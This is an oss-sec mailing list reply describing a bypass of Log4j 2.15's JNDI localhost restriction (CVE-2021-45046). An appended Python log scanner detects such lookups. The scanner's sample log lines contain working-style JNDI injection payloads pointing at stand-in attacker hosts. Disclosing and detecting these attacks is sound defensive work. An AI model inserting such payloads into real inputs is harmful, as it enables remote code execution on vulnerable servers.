oss-sec mailing list archives
Re: CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack
From: Moritz Bechler <mbechler () eenterphace org>
Date: Sat, 18 Dec 2021 11:30:16 +0100
Hi,
For >=2.15 this is mostly mitigated by the fact that the protocol and target host to which lookups are possible are also restricted to localhost by default. There still seems to be a way to hang/crash the process, though.
Updating that for completeness: a bypass of that hostname restriction was found by Alvaro Munoz, exploiting different URI interpretations by the standard Uri class and JNDI.
Therefore 2.15 can be vulnerable again for RCE, if a layout with attacker-controlled input outside the message is used or the expression lookup has been re-enabled.
This also requires resolving a DNS name like 127.0.0.1#x.y.z or localhost#x.y.z, which some resolvers and likely recursors will directly reject.
Moritz
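As an added example (not part of the post above), a small detection routine that scans log lines for JNDI lookup strings and flags the `#`-in-host pattern the message describes, where java.net.URI and JNDI's own URI parser disagree about where the host ends. The host allowlist mirrors the 2.15 localhost default; the log lines and hostnames are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Constructed sample log lines (not from the original post).
SAMPLE_LOG = """\
2021-12-18 10:00:01 INFO  user=alice action=login
2021-12-18 10:00:02 INFO  ua=${jndi:ldap://127.0.0.1#attacker.example:1389/a}
2021-12-18 10:00:03 INFO  ua=${jndi:ldap://localhost:1389/a}
2021-12-18 10:00:04 INFO  ua=${jndi:rmi://evil.example/obj}
"""

# Matches the lookup body between "${jndi:" and the closing brace.
JNDI_RE = re.compile(r"\$\{jndi:([^}]*)\}", re.IGNORECASE)

# Assumed allowlist: Log4j 2.15 restricts JNDI targets to localhost by default.
ALLOWED_HOSTS = {"localhost", "127.0.0.1", "::1"}


def classify(uri: str) -> str:
    """Classify one JNDI URI from a defender's point of view."""
    try:
        parts = urlsplit(uri)
    except ValueError:
        return "unparseable"
    # java.net.URI stops the authority at '#', so a host-only check sees
    # "127.0.0.1"; the JNDI-side parser keeps "127.0.0.1#attacker.example"
    # as the name to resolve. Treat any '#' in the authority as suspicious.
    if "#" in uri and parts.fragment:
        return "uri-fragment-bypass"
    host = (parts.hostname or "").lower()
    if host in ALLOWED_HOSTS:
        return "local-host"
    return "non-local-host"


def scan(log_text: str):
    """Return (line_no, uri, verdict) for every JNDI lookup found."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        for uri in JNDI_RE.findall(line):
            findings.append((line_no, uri, classify(uri)))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```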